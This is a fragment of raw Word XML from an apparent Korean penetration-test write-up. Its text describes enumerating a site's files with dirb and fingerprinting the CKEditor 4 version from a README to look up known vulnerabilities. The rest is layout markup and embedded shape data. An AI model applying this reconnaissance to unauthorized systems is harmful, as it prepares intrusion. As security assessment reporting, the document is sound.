        <w:t xml:space="preserve"> 세 가지 파일에서, File.jsp의 문구들을 보면 Bootstrap 3의 기본 템플릿 예제에서 그대로 가져온 텍스트로 운영자가 이 샘플을 기반으로 게시판을 제작할 때 도움받았다는 것을 추측할 수 있습니다. /npm.js 파일은 공식 bootstrap 소스코드로, CommonJS 환경에서 모듈을 쓰기 위한 스크립트입니다. 또한, /ckeditor/README.md 파일은 ‘ckeditor4’라는 ckeditor의 버전이 그대로 들어있으니 해당 버전의 알려진 취약점을 찾을 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="457"/>
    <w:p w14:paraId="41DB2A41" w14:textId="77777777" w:rsidR="00933CCF" w:rsidRPr="00933CCF" w:rsidRDefault="00933CCF" w:rsidP="00933CCF">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338A175D" w14:textId="0112B66A" w:rsidR="00001921" w:rsidRPr="00001921" w:rsidRDefault="00F316BD" w:rsidP="00001921">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251856896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1591DE9D" wp14:editId="5B672F83">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1119596</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2251529</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1801495" cy="146957"/>
                <wp:effectExtent l="0" t="0" r="27305" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="1293467098" name="직사각형 1293467098"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1801495"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09A3C" id="직사각형 1293467098" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:88.15pt;margin-top:177.3pt;width:141.85pt;height:11.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1EvugIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0muncRC5MBI4KJA&#10;kARNiqxpirQEUCRL0pbdXXqHAL1BN130XEV6hw5JSTHSoIuiWlAkZ+YN583n5HTbCLRhxtZKFjg7&#10;SDFikqqylqsCf7xdvDnGyDoiSyKUZAXeMYtPZ69fnbQ6ZyNVKVEygwBE2rzVBa6c03mSWFqxhtgD&#10;pZkEIVemIQ6OZpWUhrSA3ohklKaHSatMqY2izFq4PY9CPAv4nDPqrji3zCFRYHibC6sJ69KvyeyE&#10;5CtDdFXT7hnkH17RkFqC0wHqnDiC1qb+A6qpqVFWcXdAVZMozmvKQgwQTZY+i+amIpqFWIAcqwea&#10;7P+DpZeba4PqEnI3mr4dHx6lU8iYJA3k6vHb/eOX7z9/3P/6+oD2xMBZq20Opjf62nQnC1tPwJab&#10;xv8hNLQNPO8GntnWIQqX2XGajacTjCjIsvHhdHLkE5E8WWtj3TumGuQ3BTaQx0Av2VxYF1V7Fe9M&#10;qkUtBNyTXEjUAug0naTBwipRl17qhdaslmfCoA2BclgsUvg6x3tq8Awh4TU+xhhV2LmdYNHBB8aB&#10;MYhjFD34WmUDLKGUSZdFUUVKFr1N9p31FiFmIQHQI3N45YDdAfSaEaTHjgx0+t6UhVIfjLvQ/2Y8&#10;WATPSrrBuKmlMi9FJiCqznPU70mK1HiWlqrcQT0ZFRvNarqoIYMXxLprYqCzoAdhWrgrWLhQkCnV&#10;7TCqlPn80r3Xh4IHKUYtdGqB7ac1MQwj8V5CK0yz8di3djiMJ0cjOJh9yXJfItfNmYLsZzCXNA1b&#10;r+9Ev+VGNXcwVObeK4iIpOC7wNSZ/nDm4gSBsUTZfB7UoJ01cRfyRlMP7ln1FXq7vSNGd2XsoAEu&#10;Vd/VJH9WzVHXW0o1XzvF61DqT7x2fMMoCIXTjS0/a/bPQetpuM5+AwAA//8DAFBLAwQUAAYACAAA&#10;ACEACEQu+N8AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KhDWuIqjVMB&#10;EkIgDlDo3Y23SdR4HcVuEv6e5QTHmX2anSm2s+vEiENoPWm4XSQgkCpvW6o1fH0+3axBhGjIms4T&#10;avjGANvy8qIwufUTfeC4i7XgEAq50dDE2OdShqpBZ8LC90h8O/rBmchyqKUdzMThrpNpkmTSmZb4&#10;Q2N6fGywOu3OTsO7Px1lt0/TV/XwnKoXt57q8U3r66v5fgMi4hz/YPitz9Wh5E4HfyYbRMdaZUtG&#10;NSzvVhkIJlZZwusO7CilQJaF/L+h/AEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBIQ1Ev&#10;ugIAAKQFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAI&#10;RC743wAAAAsBAAAPAAAAAAAAAAAAAAAAABQFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAIAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BE3AA3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251862016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50B2C7C4" wp14:editId="20969B9E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1125039</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3059067</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1366157" cy="130629"/>
                <wp:effectExtent l="0" t="0" r="24765" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="1293467099" name="직사각형 1293467099"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1366157" cy="1306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CBC03" id="직사각형 1293467099" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:88.6pt;margin-top:240.85pt;width:107.55pt;height:10.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smugIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNMl2d8tGzVarVouQ&#10;qlLRop69jr2J5NjG9m52uZV3QOINuHDguVB5B8Z2kq5KxQGRg2N7Zr7xfPNzerZrBNoyY2slC5wd&#10;pRgxSVVZy3WBP9wuX73GyDoiSyKUZAXeM4vP5i9fnLY6ZyNVKVEygwBE2rzVBa6c03mSWFqxhtgj&#10;pZkEIVemIQ6OZp2UhrSA3ohklKbTpFWm1EZRZi3cXkQhngd8zhl17zi3zCFRYHibC6sJ68qvyfyU&#10;5GtDdFXT7hnkH17RkFqC0wHqgjiCNqb+A6qpqVFWcXdEVZMozmvKQgwQTZY+ieamIpqFWIAcqwea&#10;7P+DpVfba4PqEnI3mh2PpyfpbIaRJA3k6uHb/cPn7z9/3P/6+gUdiIGzVtscTG/0telOFraegB03&#10;jf9DaGgXeN4PPLOdQxQus+PpNJucYERBlh2n09HMJyJ5tNbGujdMNchvCmwgj4Fesr20Lqr2Kt6Z&#10;VMtaCLgnuZCoBdBZOkmDhVWiLr3UC61Zr86FQVsC5bBcpvB1jg/U4BlCwmt8jDGqsHN7waKD94wD&#10;YxDHKHrwtcoGWEIpky6LooqULHqbHDrrLULMQgKgR+bwygG7A+g1I0iPHRno9L0pC6U+GHeh/814&#10;sAielXSDcVNLZZ6LTEBUneeo35MUqfEsrVS5h3oyKjaa1XRZQwYviXXXxEBnQQ/CtHDvYOFCQaZU&#10;t8OoUubTc/deHwoepBi10KkFth83xDCMxFsJrTDLxmPf2uEwnpyM4GAOJatDidw05wqyn8Fc0jRs&#10;vb4T/ZYb1dzBUFl4ryAikoLvAlNn+sO5ixMExhJli0VQg3bWxF3KG009uGfVV+jt7o4Y3ZWxgwa4&#10;Un1Xk/xJNUddbynVYuMUr0OpP/La8Q2jIBRON7b8rDk8B63H4Tr/DQAA//8DAFBLAwQUAAYACAAA&#10;ACEAnN2qTN8AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMAyG70i8Q2QkbixdBqSUphMg&#10;IQTiAGO7Z03WVkucqsna8vaYE9z8y59+fy7Xs3dstEPsAipYLjJgFutgOmwUbL+er3JgMWk02gW0&#10;Cr5thHV1flbqwoQJP+24SQ2jEoyFVtCm1Becx7q1XsdF6C3S7hAGrxPFoeFm0BOVe8dFlt1yrzuk&#10;C63u7VNr6+Pm5BV8hOOBu50Qb/LxRchXn0/N+K7U5cX8cA8s2Tn9wfCrT+pQkdM+nNBE5ihLKQhV&#10;cJ0vJTAiVndiBWyv4CajgVcl//9D9QMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBcOWsm&#10;ugIAAKQFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCc&#10;3apM3wAAAAsBAAAPAAAAAAAAAAAAAAAAABQFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAIAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BE3AA3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251851776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B770738" wp14:editId="4CDCCCDF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1125039</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1812653</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1692547" cy="146957"/>
                <wp:effectExtent l="0" t="0" r="22225" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="1293467097" name="직사각형 1293467097"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1692547"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9AE58" id="직사각형 1293467097" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:88.6pt;margin-top:142.75pt;width:133.25pt;height:11.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jruQIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNMmyP2zUbLVqtQip&#10;ale0qGevY28iObaxvX/cyjsg8QZcOPBcqLwDYztJV6XigMjBsT0z33i++Tk92zcCbZmxtZIFzk5S&#10;jJikqqzlusAfbhev3mBkHZElEUqyAh+YxWezly9OdzpnA1UpUTKDAETafKcLXDmn8ySxtGINsSdK&#10;MwlCrkxDHBzNOikN2QF6I5JBmo6TnTKlNooya+H2IgrxLOBzzqi75twyh0SB4W0urCasK78ms1OS&#10;rw3RVU3bZ5B/eEVDaglOe6gL4gjamPoPqKamRlnF3QlVTaI4rykLMUA0WfokmpuKaBZiAXKs7mmy&#10;/w+WXm2XBtUl5G4wfT0cT9LpBCNJGsjVw7f7h8/ff/64//X1CzoSA2c7bXMwvdFL054sbD0Be24a&#10;/4fQ0D7wfOh5ZnuHKFxm4+lgNAQ/FGTZcDwdTXwikkdrbax7y1SD/KbABvIY6CXbS+uiaqfinUm1&#10;qIWAe5ILiXYAOk1HabCwStSll3qhNevVuTBoS6AcFosUvtbxkRo8Q0h4jY8xRhV27iBYdPCecWAM&#10;4hhED75WWQ9LKGXSZVFUkZJFb6NjZ51FiFlIAPTIHF7ZY7cAnWYE6bAjA62+N2Wh1HvjNvS/GfcW&#10;wbOSrjduaqnMc5EJiKr1HPU7kiI1nqWVKg9QT0bFRrOaLmrI4CWxbkkMdBb0IEwLdw0LFwoypdod&#10;RpUyn5679/pQ8CDFaAedWmD7cUMMw0i8k9AK02w49K0dDsPRZAAHcyxZHUvkpjlXkP0M5pKmYev1&#10;nei23KjmDobK3HsFEZEUfBeYOtMdzl2cIDCWKJvPgxq0sybuUt5o6sE9q75Cb/d3xOi2jB00wJXq&#10;uprkT6o56npLqeYbp3gdSv2R15ZvGAWhcNqx5WfN8TloPQ7X2W8AAAD//wMAUEsDBBQABgAIAAAA&#10;IQDy2G474AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqIP7cBTiVICE&#10;EKgLKLB3YzeJao+j2E3C3zOsYHk1R/eeKbezd2y0Q+wCKrhdZMAs1sF02Cj4/Hi6yYHFpNFoF9Aq&#10;+LYRttXlRakLEyZ8t+M+NYxKMBZaQZtSX3Ae69Z6HReht0i3Yxi8ThSHhptBT1TuHRdZtuFed0gL&#10;re7tY2vr0/7sFbyF05G7LyFe5cOzkC8+n5pxp9T11Xx/ByzZOf3B8KtP6lCR0yGc0UTmKEspCFUg&#10;8vUaGBGr1VICOyhYZvkGeFXy/z9UPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCBVfjr&#10;uQIAAKQFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDy&#10;2G474AAAAAsBAAAPAAAAAAAAAAAAAAAAABMFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAIAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BE3AA3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04FACAFF" wp14:editId="4DAC63FF">
            <wp:extent cx="4571683" cy="3442608"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="24765"/>
            <wp:docPr id="931" name="그림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그림 931"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId28">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2988" t="34153" r="58754" b="12088"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3442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9405CF" w14:textId="4A110472" w:rsidR="00001921" w:rsidRDefault="00001921" w:rsidP="00001921">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="458" w:name="_Toc209094656"/>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83</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. dirb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>도구를 이용해 파일과 폴더 탐색</w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w14:paraId="6B0F49A3" w14:textId="77777777" w:rsidR="00001921" w:rsidRDefault="00001921" w:rsidP="00001921">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB872F5" w14:textId="0C374EC7" w:rsidR="00001921" w:rsidRDefault="00A1750E" w:rsidP="00001921">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251872256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F358FF4" wp14:editId="6985176F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1233895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1872161</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3907971" cy="2944586"/>
                <wp:effectExtent l="0" t="0" r="16510" b="27305"/>
                <wp:wrapNone/>
                <wp:docPr id="1293467102" name="직사각형 1293467102"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3907971" cy="29445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984AF" id="직사각형 1293467102" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:97.15pt;margin-top:147.4pt;width:307.7pt;height:231.8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iquwIAAKUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG8mKHcdC5MBI4KJA&#10;kBhNiqxpirQEUCRL0r/u0jsU6A266aLnKtI7dEhKipEGXRT1giY1M29m3nzOzneNQBtmbK1kgQdH&#10;KUZMUlXWclXgD3fzN6cYWUdkSYSSrMB7ZvH59PWrs63OWaYqJUpmEIBIm291gSvndJ4kllasIfZI&#10;aSZByJVpiIOnWSWlIVtAb0SSpelJslWm1EZRZi18vYxCPA34nDPqbji3zCFRYIjNhdOEc+nPZHpG&#10;8pUhuqppGwb5hygaUktw2kNdEkfQ2tR/QDU1Ncoq7o6oahLFeU1ZyAGyGaTPsrmtiGYhFyDH6p4m&#10;+/9g6fVmYVBdQu2yyfHwZDxIM4wkaaBWj98eHj9///nj4dfXL+hADJxttc3B9FYvTPuycPUE7Lhp&#10;/D+khnaB533PM9s5ROHj8SQdT8YDjCjIsslwODo98ZVInsy1se4tUw3ylwIbKGTgl2yurIuqnYr3&#10;JtW8FgK+k1xItIVsJukoDRZWibr0Ui+0ZrW8EAZtCPTDfJ7Cr3V8oAZhCAnR+CRjWuHm9oJFB+8Z&#10;B8ogkSx68M3KelhCKZNuEEUVKVn0Njp01lmEnIUEQI/MIcoeuwXoNCNIhx0ZaPW9KQu93hu3qf/N&#10;uLcInpV0vXFTS2VeykxAVq3nqN+RFKnxLC1VuYeGMipOmtV0XkMFr4h1C2JgtGAIYV24Gzi4UFAp&#10;1d4wqpT59NJ3rw8dD1KMtjCqBbYf18QwjMQ7CbMwGQyHfrbDYzgaZ/Awh5LloUSumwsF1Yf2g+jC&#10;1es70V25Uc09bJWZ9woiIin4LjB1pntcuLhCYC9RNpsFNZhnTdyVvNXUg3tWfYfe7e6J0W0bO5iA&#10;a9WNNcmfdXPU9ZZSzdZO8Tq0+hOvLd+wC0LjtHvLL5vDd9B62q7T3wAAAP//AwBQSwMEFAAGAAgA&#10;AAAhALjCVhLgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyog2nJgzgV&#10;ICFExQLasndjN4lqj6PYTcLfM6xgeTVHd84t17OzbDRD6DxKuF0kwAzWXnfYSNjvXm4yYCEq1Mp6&#10;NBK+TYB1dXlRqkL7CT/NuI0NoxIMhZLQxtgXnIe6NU6Fhe8N0u3oB6cixaHhelATlTvLRZLcc6c6&#10;pA+t6s1za+rT9uwkfPjTkdsvITbp06tI31w2NeO7lNdX8+MDsGjm+AfDrz6pQ0VOB39GHZilnC/v&#10;CJUg8iVtICJL8hTYQUK6ylbAq5L/31D9AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEB&#10;AAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9&#10;If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKS+&#10;KKq7AgAApQUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;ALjCVhLgAAAACwEAAA8AAAAAAAAAAAAAAAAAFQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAAAiBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251867136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20CDE583" wp14:editId="31E0E972">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1903367</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>277404</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1475014" cy="201386"/>
                <wp:effectExtent l="0" t="0" r="11430" b="27305"/>
                <wp:wrapNone/>
                <wp:docPr id="1293467100" name="직사각형 1293467100"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1475014"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263F" id="직사각형 1293467100" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:149.85pt;margin-top:21.85pt;width:116.15pt;height:15.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IOkuQIAAKQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0mOnY8QOTASuCgQ&#10;JEaTImuaIi0BFMmStGV3l96hQG/QTRc9V5HeoUNSUow06KKoFhTJmXnDefM5O982Am2YsbWSBc4O&#10;UoyYpKqs5arAH+7mb04wso7IkgglWYF3zOLz6etXZ63O2UhVSpTMIACRNm91gSvndJ4kllasIfZA&#10;aSZByJVpiIOjWSWlIS2gNyIZpelR0ipTaqMosxZuL6MQTwM+54y6G84tc0gUGN7mwmrCuvRrMj0j&#10;+coQXdW0ewb5h1c0pJbgdIC6JI6gtan/gGpqapRV3B1Q1SSK85qyEANEk6XPormtiGYhFiDH6oEm&#10;+/9g6fVmYVBdQu5Gp4fjo+MsBZokaSBXj98eHj9///nj4dfXL2hPDJy12uZgeqsXpjtZ2HoCttw0&#10;/g+hoW3geTfwzLYOUbjMxseTNBtjREEGcR+eHPlEJE/W2lj3lqkG+U2BDeQx0Es2V9ZF1V7FO5Nq&#10;XgsB9yQXErXg4TSdpMHCKlGXXuqF1qyWF8KgDYFymM9T+DrHe2rwDCHhNT7GGFXYuZ1g0cF7xoEx&#10;iGMUPfhaZQMsoZRJl0VRRUoWvU32nfUWIWYhAdAjc3jlgN0B9JoRpMeODHT63pSFUh+Mu9D/ZjxY&#10;BM9KusG4qaUyL0UmIKrOc9TvSYrUeJaWqtxBPRkVG81qOq8hg1fEugUx0FlQXDAt3A0sXCjIlOp2&#10;GFXKfHrp3utDwYMUoxY6tcD245oYhpF4J6EVTrPx2Ld2OIwnxyM4mH3Jcl8i182FguxnMJc0DVuv&#10;70S/5UY19zBUZt4riIik4LvA1Jn+cOHiBIGxRNlsFtSgnTVxV/JWUw/uWfUVere9J0Z3ZeygAa5V&#10;39Ukf1bNUddbSjVbO8XrUOpPvHZ8wygIhdONLT9r9s9B62m4Tn8DAAD//wMAUEsDBBQABgAIAAAA&#10;IQBJQpNS3wAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLCXb6FaaToCE&#10;EIgDjO2eNV5brXGqJmvL22NOcLIsf/r9/flmcq0YsA+NJw23swQEUultQ5WG3dfzzQpEiIasaT2h&#10;hm8MsCkuL3KTWT/SJw7bWAkOoZAZDXWMXSZlKGt0Jsx8h8S3o++dibz2lbS9GTnctVIlyZ10piH+&#10;UJsOn2osT9uz0/DhT0fZ7pV6Sx9fVPrqVmM1vGt9fTU93IOIOMU/GH71WR0Kdjr4M9kgWg1qvU4Z&#10;1bCY82RgOVdc7qAhXS5AFrn836D4AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAH24g6S5&#10;AgAApAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAElC&#10;k1LfAAAACQEAAA8AAAAAAAAAAAAAAAAAEwUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAAfBgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00250FDC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E90EA3B" wp14:editId="1C689860">
            <wp:extent cx="4571752" cy="4838700"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="190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914"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="4838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20E95" w14:textId="2AD949BC" w:rsidR="00E22378" w:rsidRDefault="00001921" w:rsidP="00E22378">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="_Toc209094657"/>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84</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00CC433C">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00CC433C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00CC433C">
        <w:t>ile.</w:t>
      </w:r>
      <w:r w:rsidR="0008175A">
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="0008175A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0008175A">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="0008175A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 파일</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
